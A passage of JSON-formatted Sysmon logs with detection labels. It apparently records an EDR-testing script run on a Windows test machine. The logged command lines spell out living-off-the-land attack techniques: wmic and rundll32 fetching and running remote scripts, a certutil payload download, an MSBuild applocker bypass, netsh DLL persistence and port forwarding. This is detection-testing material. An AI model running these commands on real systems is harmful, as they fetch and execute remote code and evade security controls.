21:33:49.535"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4936,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:49.748805Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"MSBuild.exe","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=9672CADE96C657A8860D60923AFDBE4C46A2935D,MD5=4D7D4D92DC7D86B72ABF81821FF83837,SHA256=B60EB62F6C24D4A495A0DAB95CC49624AC5099A2CC21F8BD010A410401AB8CC3,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-663D-5D3F-0000-00106F608A00","ParentProcessId":3240,"ProcessGuid":"747F3D96-663D-5D3F-0000-001062708A00","ProcessId":5340,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:49.881"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4938,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:50.104868Z"}},"Version":5}}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"wmic process get brief /format:\"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c wmic process get brief /format:\"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6641-5D3F-0000-0010A38C8A00","ParentProcessId":4260,"ProcessGuid":"747F3D96-6642-5D3F-0000-0010F69D8A00","ProcessId":4896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:54.044"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4941,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:54.246154Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-07-29 21:33:54.618","Image":"C:\\Windows\\System32\\Wbem\\WMIC.exe","ProcessGuid":"747F3D96-6642-5D3F-0000-0010F69D8A00","ProcessId":4896,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\LQ86GWLO\\Wmic_calc[1].xsl","UtcTime":"2019-07-29 21:33:54.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4942,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:54.630548Z"}},"Version":2}}}},{"detection":["Capture a Network Trace with netsh.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6646-5D3F-0000-0010E32E8B00","ProcessId":5084,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:58.245"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4945,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:58.256845Z"}},"Version":5}}}},{"detection":["Capture a Network Trace with netsh.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-0010E32E8B00","ParentProcessId":5084,"ProcessGuid":"747F3D96-6647-5D3F-0000-0010AE6E8B00","ProcessId":5056,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.141"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4952,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:00.420234Z"}},"Version":5}}}},{"detection":["Netsh Port Forwarding"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-0010A7398B00","ParentProcessId":3868,"ProcessGuid":"747F3D96-6647-5D3F-0000-001065758B00","ProcessId":5048,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.368"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4954,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:00.442242Z"}},"Version":5}}}},{"detection":["Netsh Port Forwarding"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-001029398B00","ParentProcessId":6760,"ProcessGuid":"747F3D96-6647-5D3F-0000-001057768B00","ProcessId":4028,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.390"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4955,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:00.460197Z"}},"Version":5}}}},{"detection":["Suspicious Netsh DLL Persistence"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"netsh.exe add helper AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh.exe add helper AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-001051388B00","ParentProcessId":3824,"ProcessGuid":"747F3D96-6647-5D3F-0000-0010927C8B00","ProcessId":5236,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.544"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4956,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:00.466817Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"192.168.1.1/8000","EventType":"SetValue","Image":"C:\\Windows\\system32\\netsh.exe","ProcessGuid":"747F3D96-6647-5D3F-0000-001057768B00","ProcessId":4028,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PortProxy\\v4tov4\\tcp\\0.0.0.0/8080","UtcTime":"2019-07-29 21:33:59.803"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4957,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:00.707406Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-DCFC-5D3F-0000-0010F1520000","ProcessId":568,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NdisCap\\Start","UtcTime":"2019-07-29 21:34:00.367"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4962,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:01.057426Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-DCFC-5D3F-0000-0010F1520000","ProcessId":568,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NdisCap\\Start","UtcTime":"2019-07-29 21:34:00.678"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4964,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:01.660499Z"}},"Version":2}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6652-5D3F-0000-0010B9708C00","ProcessId":5844,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:10.292"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4969,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:10.373481Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6652-5D3F-0000-0010B9708C00","ParentProcessId":5844,"ProcessGuid":"747F3D96-6652-5D3F-0000-001058828C00","ProcessId":348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:10.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4971,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:10.708142Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6657-5D3F-0000-001029198D00","ProcessId":1808,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:15.202"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4975,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:15.226408Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6657-5D3F-0000-001029198D00","ParentProcessId":1808,"ProcessGuid":"747F3D96-6657-5D3F-0000-001011298D00","ProcessId":1004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:15.502"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4977,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:15.658168Z"}},"Version":5}}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-665C-5D3F-0000-0010096B8D00","ProcessId":7088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:20.134"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4978,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:20.238305Z"}},"Version":5}}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"certutil.exe -urlcache -split -f 